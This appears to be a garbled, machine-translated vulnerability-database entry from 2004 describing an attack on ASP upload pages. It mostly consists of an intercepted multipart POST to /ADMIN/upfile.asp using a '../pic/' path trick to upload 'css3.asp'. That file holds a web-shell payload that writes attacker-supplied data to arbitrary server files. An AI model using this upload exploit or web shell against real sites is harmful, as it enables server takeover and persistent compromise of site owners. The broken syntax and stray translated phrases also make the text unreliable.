Vulnerability database
Release date:
2004-10-29 22:26:53
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Tip, the three uses of the method of submission of UPLOAD.ASP UPLOAD.HTM UPFILE.ASP Upfile.htm Cookies to find a point, http: //, casual A horse, mm.asp, and listens for WSocKexpert.
Intercept information Save to a.txt POST /ADMIN/upfile.asp http / 1.1 accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, application /, application / vnd. MS-Excel, Application / Msword, Application / X-Shockwave-Flash, * / * Referer: accept-language: zh-cn content-type: multipart / form-data Boundary = -------------------------- 7D4BC1200E8 Accept-Encoding: Gzip, Deflate User-agent: mozilla / 4.0 (Compatible; Msie 6.0) ; Windows NT 5.1; Maxthon) Host: Content-Length: 1641 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDAASRSRST = BIFOBMEAIPKGAHDBLHJJJFEE ---------------- ------------- 7D4BC1200E8 Content-disposition: form-data; name = "filepath" ../pic/ ------------------ ------------ 7D4BC1200E8 Content-Disposition: form-data; name = "ACT" strange, how do you have a line of 2004xxxxxx's upload file? ? ? Upload ---------------------------- 7D4BC1200E8 Content-Disposition: form-data; name = "file1"; filename = "C: /css3.asp "Content-Type: Text / Plain <% DIM OBJFSO%> <% DIM FDATA%> <% DIM ObjcountFile%> <% on error resume next%> <% set objfso = server.createObject (" scripting. FilesystemObject ")%> <% if Trim (Request (" syfdpath ")) <>" "" "<% fdata = request (" cyfddata ")%> <% set objcountfile = objfso.createtextfile (Request (" SyfdPath " ), True> <% ObjcountFile.write fdata%> <% if err = 0 THEN%> <% response.write " SAVE SUCCESS! Font>"%> <% ELSE%> <% response.write save unsuccess! font>%> <% end if%> <% err.clear%> <
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